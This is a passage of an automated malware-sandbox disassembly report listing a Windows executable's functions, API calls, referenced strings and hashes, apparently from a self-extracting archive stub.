Part of subcall function 005A17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,0059BB05,00000000,.exe,?,?,00000800,?,?,005A85DF,?), ref: 005A17C2

Strings

<, xrefs: 005AC41E
MAX, xrefs: 005AC487
MIN, xrefs: 005AC4A3
HIDE, xrefs: 005AC474

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CompareString_wcschr
String ID: <$HIDE$MAX$MIN
API String ID: 2548945186-3358265660
Opcode ID: 8a4379fffe54d6140e9a464f964a76a09eb9d69dfcb23e8178813203024bec71
Instruction ID: ed46addac0030a573b083de38c3623a465ebb9e55a0d59bf6f2e897332a18d17
Opcode Fuzzy Hash: 8a4379fffe54d6140e9a464f964a76a09eb9d69dfcb23e8178813203024bec71
Instruction Fuzzy Hash: 5731827690460DAADF21DA94DC55EEE7FBCFB59300F004066FA0996050EBB19EC4CA50

Function 005AA990 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 63COMMON

Download Yara Rule

APIs

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

EndDialog.USER32(?,00000001), ref: 005AA9DE
GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 005AA9F6
SetDlgItemTextW.USER32(?,00000067,?), ref: 005AAA24

Strings

xj^, xrefs: 005AAA02
GETPASSWORD1, xrefs: 005AA9A9

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: GETPASSWORD1$xj^
API String ID: 445417207-3588992345
Opcode ID: 09e5e6c7f43eefe1f503ebc7a2b55db36aca91719d9cd145ebdbfd8ff90657cc
Instruction ID: 9a6dd806769aba1c76f3bb7e4f10a8d53db08943de2b23446f3a9568f5420a1a
Opcode Fuzzy Hash: 09e5e6c7f43eefe1f503ebc7a2b55db36aca91719d9cd145ebdbfd8ff90657cc
Instruction Fuzzy Hash: 341108339401197ADB219A649D09FFF7FBCFB5A710F000421FA45F2090D7659D95D672

Function 005AADED Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59windowCOMMON

Download Yara Rule

APIs

LoadBitmapW.USER32(00000065), ref: 005AADFD
GetObjectW.GDI32(00000000,00000018,?), ref: 005AAE22
DeleteObject.GDI32(00000000), ref: 005AAE54
DeleteObject.GDI32(00000000), ref: 005AAE77

Part of subcall function 005A9E1C: FindResourceW.KERNEL32(005AAE4D,PNG,?,?,?,005AAE4D,00000066), ref: 005A9E2E
Part of subcall function 005A9E1C: SizeofResource.KERNEL32(00000000,00000000,?,?,?,005AAE4D,00000066), ref: 005A9E46
Part of subcall function 005A9E1C: LoadResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E59
Part of subcall function 005A9E1C: LockResource.KERNEL32(00000000,?,?,?,005AAE4D,00000066), ref: 005A9E64

Strings

], xrefs: 005AAE2A

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
String ID: ]
API String ID: 142272564-3352871620
Opcode ID: ec753928218e1e4dacfd70231a9e7a7ade6222984c84aca81a270fd2faaee47e
Instruction ID: 1f18da0816c1962b95aecfc15c46fc250c760f220afd81de9ebe7b6c33f8144a
Opcode Fuzzy Hash: ec753928218e1e4dacfd70231a9e7a7ade6222984c84aca81a270fd2faaee47e
Instruction Fuzzy Hash: 0A01C036541226A6C71167649C0DA7F7FAEBBD3B52F180015BD00EB291DF358C19D6B2

Function 005ACC90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

EndDialog.USER32(?,00000001), ref: 005ACCDB
GetDlgItemTextW.USER32(?,00000068,00000800), ref: 005ACCF1
SetDlgItemTextW.USER32(?,00000066,?), ref: 005ACD05
SetDlgItemTextW.USER32(?,00000068), ref: 005ACD14

Strings

RENAMEDLG, xrefs: 005ACCA8

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: RENAMEDLG
API String ID: 445417207-3299779563
Opcode ID: 33bbba9f64960d7879da20dfec171e4e1e447419d02ca29439833f57905d6124
Instruction ID: 708819a427de0e4e4425207c0c18d831b71a77eddc33d9256962289459977c1e
Opcode Fuzzy Hash: 33bbba9f64960d7879da20dfec171e4e1e447419d02ca29439833f57905d6124
Instruction Fuzzy Hash: 4501F5326942507AD7114B649C0AF6B3FACBB6B712F200411F34AE60A0C6655D08DB75

Function 005B2503 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 005B251A

Part of subcall function 005B2B52: ___AdjustPointer.LIBCMT ref: 005B2B9C

_UnwindNestedFrames.LIBCMT ref: 005B2531
___FrameUnwindToState.LIBVCRUNTIME ref: 005B2543
CallCatchBlock.LIBVCRUNTIME ref: 005B2567

Strings

/)[, xrefs: 005B2526, 005B2517

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
String ID: /)[
API String ID: 2633735394-1957678936
Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction ID: 1c7be66c5fa6ce0d4e2aa76d778605387072bb7fcdff6a911ee78924a035cb60
Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
Instruction Fuzzy Hash: B4011732000109BBCF229F55DC55EDA3FBAFF99710F058414F91866160C336E962EFA1

Function 005B75C2 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,005B7573,00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002), ref: 005B75E2
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005B75F5
FreeLibrary.KERNEL32(00000000,?,?,?,005B7573,00000000,?,005B7513,00000000,005CBAD8,0000000C,005B766A,00000000,00000002), ref: 005B7618

Strings

mscoree.dll, xrefs: 005B75DB
CorExitProcess, xrefs: 005B75ED

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 9e1cf1e851793749d7bdb1f834f3279e444618185917422828942018d99740d6
Instruction ID: f48eed9adda904d60937b4919a6c31761b1ab69fe15faa775bc4b87e67f6758d
Opcode Fuzzy Hash: 9e1cf1e851793749d7bdb1f834f3279e444618185917422828942018d99740d6
Instruction Fuzzy Hash: C7F03C71A18A1CBFDB159F94DC09FDDBFB9FB58711F144068E805A2150EB309A88DA94

Function 0059EB73 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 005A0085: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 005A00A0
Part of subcall function 005A0085: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0059EB86,Crypt32.dll,00000000,0059EC0A,?,?,0059EBEC,?,?,?), ref: 005A00C2

GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0059EB92
GetProcAddress.KERNEL32(005D81C0,CryptUnprotectMemory), ref: 0059EBA2

Strings

CryptUnprotectMemory, xrefs: 0059EB98
CryptProtectMemory, xrefs: 0059EB8C
Crypt32.dll, xrefs: 0059EB7C

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: 29262b01eebcac080a6fba828eb13a1541b04121c11b3f2696444e1e156064dd
Instruction ID: 2a20fd96f8140b541c316421c486c77000d7fbaec99bbaa8b6ad4e791faef6b4
Opcode Fuzzy Hash: 29262b01eebcac080a6fba828eb13a1541b04121c11b3f2696444e1e156064dd
Instruction Fuzzy Hash: F3E04F718007459ECB30AF74980EF46BEE47B14704B00C81DE4D6E3590D6F4D5448B50

Function 005B7DD9 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005B7E4B
_free.LIBCMT ref: 005B7E6B

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 63808fa3c2f10fe63b22c7becc2841ce3b8b2da61e476aca90e3b0369af3cbfe
Instruction ID: c8c4e0eceaa718072ad565363abc893598f9ee567c0cf1076efd189f25a82bc0
Opcode Fuzzy Hash: 63808fa3c2f10fe63b22c7becc2841ce3b8b2da61e476aca90e3b0369af3cbfe
Instruction Fuzzy Hash: 49417132A002049FDB14DF78D985AAEBBA9FFC9714B1545A9E515EB341DB31EE01CB80

Function 005BB610 Relevance: 7.6, APIs: 5, Instructions: 68COMMON

Download Yara Rule

APIs

GetEnvironmentStringsW.KERNEL32 ref: 005BB619
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005BB63C

Part of subcall function 005B8518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,005BC13D,00000000,?,005B67E2,?,00000008,?,005B89AD,?,?,?), ref: 005B854A

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 005BB662
_free.LIBCMT ref: 005BB675
FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BB684

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
String ID:
API String ID: 336800556-0
Opcode ID: adfb12a3231a4db4b1211af6292f580cc44532448a6b44b202068701005e5ed6
Instruction ID: 779b9af5dd15f1d6726844a10dcb522688fdcc0da45810f58e93afc758115b69
Opcode Fuzzy Hash: adfb12a3231a4db4b1211af6292f580cc44532448a6b44b202068701005e5ed6
Instruction Fuzzy Hash: 8D017172602615BF77211A776C8DCFB6E6DFAC6BA03154229BD04C2150EFE1AD01D1B0

Function 005A075B Relevance: 7.5, APIs: 5, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 005A0A41: ResetEvent.KERNEL32(?), ref: 005A0A53
Part of subcall function 005A0A41: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 005A0A67

ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 005A078F
CloseHandle.KERNEL32(?,?), ref: 005A07A9
DeleteCriticalSection.KERNEL32(?), ref: 005A07C2
CloseHandle.KERNEL32(?), ref: 005A07CE
CloseHandle.KERNEL32(?), ref: 005A07DA

Part of subcall function 005A084E: WaitForSingleObject.KERNEL32(?,000000FF,005A0A78,?), ref: 005A0854
Part of subcall function 005A084E: GetLastError.KERNEL32(?), ref: 005A0860

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
String ID:
API String ID: 1868215902-0
Opcode ID: dce78170768de1e73ffcf2ba0c1a2027548233a0bc725653bba2d4392f3543d3
Instruction ID: 31b8e8509ff53be38607f5f43985feb7c34abbbbd0b8dda6f8459eb6c171714c
Opcode Fuzzy Hash: dce78170768de1e73ffcf2ba0c1a2027548233a0bc725653bba2d4392f3543d3
Instruction Fuzzy Hash: CF01B572440B08EFC7229B65DC88FCABFE9FB4A710F004519F15A521A1CB766A48DBA0

Function 005BBF10 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 005BBF28

Part of subcall function 005B84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958), ref: 005B84F4
Part of subcall function 005B84DE: GetLastError.KERNEL32(005C3958,?,005BBFA7,005C3958,00000000,005C3958,00000000,?,005BBFCE,005C3958,00000007,005C3958,?,005BC3CB,005C3958,005C3958), ref: 005B8506

_free.LIBCMT ref: 005BBF3A
_free.LIBCMT ref: 005BBF4C
_free.LIBCMT ref: 005BBF5E
_free.LIBCMT ref: 005BBF70

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: ffaef60ab0c75eea7f6bc2543891eaee6812a8560fd4d7c75323ee7960582d07
Instruction ID: 7f7ec265b52a3ed6e2b527b92d48f95e5d076423fe05261de7b7f793dcb0773a
Opcode Fuzzy Hash: ffaef60ab0c75eea7f6bc2543891eaee6812a8560fd4d7c75323ee7960582d07
Instruction Fuzzy Hash: 35F06272504601AB9A20EB64EECBCB67BDDBA403103644809F00AD7910CBB0FC81CB50

Function 00597574 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 93COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00597579

Part of subcall function 00593B3D: __EH_prolog.LIBCMT ref: 00593B42

GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00597640

Part of subcall function 00597BF5: GetCurrentProcess.KERNEL32(00000020,?), ref: 00597C04
Part of subcall function 00597BF5: GetLastError.KERNEL32 ref: 00597C4A
Part of subcall function 00597BF5: CloseHandle.KERNEL32(?), ref: 00597C59

Strings

SeSecurityPrivilege, xrefs: 005975BE
SeRestorePrivilege, xrefs: 005975D3

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ErrorH_prologLast$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 3813983858-639343689
Opcode ID: 4d6e4b338f2f2c43213c34ee4c4f0f67b593f00318b0b2cc2412f723f15cdd86
Instruction ID: cee9103edc117adf3bf136b1ea435341a08564253c27a797becdf983e1a168c0
Opcode Fuzzy Hash: 4d6e4b338f2f2c43213c34ee4c4f0f67b593f00318b0b2cc2412f723f15cdd86
Instruction Fuzzy Hash: 8E31B07191420EAEDF20EBA8DC49BEE7FB9FF99344F04405AF444A7182DB705A48CB61

Function 005AA430 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

Part of subcall function 0059130B: GetDlgItem.USER32(00000000,00003021), ref: 0059134F
Part of subcall function 0059130B: SetWindowTextW.USER32(00000000,005C35B4), ref: 00591365

EndDialog.USER32(?,00000001), ref: 005AA4B8
GetDlgItemTextW.USER32(?,00000066,?,?), ref: 005AA4CD
SetDlgItemTextW.USER32(?,00000066,?), ref: 005AA4E2

Strings

ASKNEXTVOL, xrefs: 005AA448

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: ItemText$DialogWindow
String ID: ASKNEXTVOL
API String ID: 445417207-3402441367
Opcode ID: aa7249a300d02419a32a4dbc9c1c8774ca0b7bf3490d69bc8b24f55894bad123
Instruction ID: 274dab90a95c14b6095d021134774e24b7ad7f3d28d25e0263d4accd61810f38
Opcode Fuzzy Hash: aa7249a300d02419a32a4dbc9c1c8774ca0b7bf3490d69bc8b24f55894bad123
Instruction Fuzzy Hash: 0511D072240211AFDE219FA89C0DF7A7FA9FB9F300F140415F240DB1A2C7A69D05E726

Function 0059D1C3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__fprintf_l.LIBCMT ref: 0059D22E
_strncpy.LIBCMT ref: 0059D278

Strings

$%s, xrefs: 0059D223
@%s, xrefs: 0059D218

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: __fprintf_l_strncpy
String ID: $%s$@%s
API String ID: 1857242416-834177443
Opcode ID: 35af7ed823a0573056b9749ecafc9ca911f92a314e43990e7f711604c2b6eaa9
Instruction ID: 88c7783864de61a52b24e0d201603a25a56ea2cb532a5e82b3edfa2432042e98
Opcode Fuzzy Hash: 35af7ed823a0573056b9749ecafc9ca911f92a314e43990e7f711604c2b6eaa9
Instruction Fuzzy Hash: 85216A76440209AEEF21DFA4CC46FEE7FB8BF05300F044526FA15961A2E371EA55DB61

Function 0059B4F7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 0059B51E

Part of subcall function 0059400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0059401D

_wcschr.LIBVCRUNTIME ref: 0059B53C
_wcschr.LIBVCRUNTIME ref: 0059B54C

Strings

%c:\, xrefs: 0059B514

Memory Dump Source

Source File: 00000000.00000002.2005757924.0000000000591000.00000020.00000001.01000000.00000003.sdmp, Offset: 00590000, based on PE: true

Associated: 00000000.00000002.2005735651.0000000000590000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005785764.00000000005C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005D4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005809509.00000000005F1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2005874735.00000000005F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_590000_5Ixz5yVfS7.jbxd

Similarity

API ID: _wcschr$__vswprintf_c_l_swprintf
String ID: %c:\
API String ID: 525462905-3142399695
Opcode ID: 474e753d602dd186c1a6b6a510bba18a06362325723776ecd019ad44f9b122d7
Instruction ID: 899061d5132673a69a4c30bff1294d0b7a9d50aa7c8b922dd9510f463a4eab16
Opcode Fuzzy Hash: 474e753d602dd186c1a6b6a510bba18a06362325723776ecd019ad44f9b122d7
Instruction Fuzzy Hash: 5601DB73504312AABF305B65ADCADABBFACFED53607558416F845C6081FB20D940C6A1

Function 005A06BA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0059ABC5,00000008,?,00000000,?,0059CB88,?,00000000), ref: 005A06F3
